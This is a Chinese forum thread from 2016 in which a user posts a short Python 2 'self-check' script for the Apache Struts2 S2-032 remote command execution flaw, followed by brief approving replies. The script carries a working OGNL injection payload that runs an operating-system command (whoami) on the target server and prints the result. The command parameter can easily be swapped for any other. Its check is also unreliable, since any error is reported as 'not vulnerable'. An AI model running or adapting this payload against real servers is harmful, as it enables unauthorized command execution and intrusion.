0808 发表于 2016-5-2 23:30:45

简易版S2-032自查脚本

今两天各大漏洞平台都被Struts2命令执行漏洞所刷屏了,网上有各种利用代码,看到他们的都很复杂,索性就写了一个Python脚本给各位测试吧!

本脚本仅用于安全测试,不得用于非法用途,否则自负!

#! /usr/bin/env python
# coding:utf-8

##############################################
#
# 简易版S2-032自查脚本 V1.0
#
# 20160428 V1.0
#
# By:EvillenG    QQ:2264672229
#
##############################################

import urllib
import sys

print
print "简易版S2-032自查脚本 V1.0 By:EvillenG"
print
print "本脚本仅用于安全测试,不得用于非法用途,否则自负!"
print

def getHtml(url):
    req = urllib.urlopen(url)
    date = req.read()
    print date


def main():

    try:
      comm = raw_input("URL:")
      get_exp = comm + "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd).getInputStream()).useDelimiter(%23parameters.pp),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\A&ppp=%20&encoding=UTF-8"
      targetHtml = getHtml(str(get_exp))

      print targetHtml
      print
      print "此网站存在Struts2命令执行漏洞,请尽快打补丁,谢谢!"
      print
    except:
      print
      print "此网站不存在Struts2命令执行漏洞,请放心使用,谢谢!"
      print


if __name__=='__main__':

    main()



yusiii 发表于 2016-5-2 23:42:00

我是来水经验的……

H.U.C-麦麦 发表于 2016-5-3 02:40:37

支持,看起来还是可以的

Jack-5 发表于 2016-5-3 02:41:17

支持,看起来还是可以的

arctic 发表于 2016-5-3 04:19:16

支持,看起来还是可以的

asion 发表于 2016-5-3 06:23:02

我是来水经验的……

云游者 发表于 2016-5-3 07:21:35

wilist 发表于 2016-5-3 08:19:37

支持,看起来还是可以的

Sty,涛 发表于 2016-5-3 09:30:14

非常感谢

fireworld 发表于 2016-5-3 12:34:32

支持,看起来还是可以的
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: 简易版S2-032自查脚本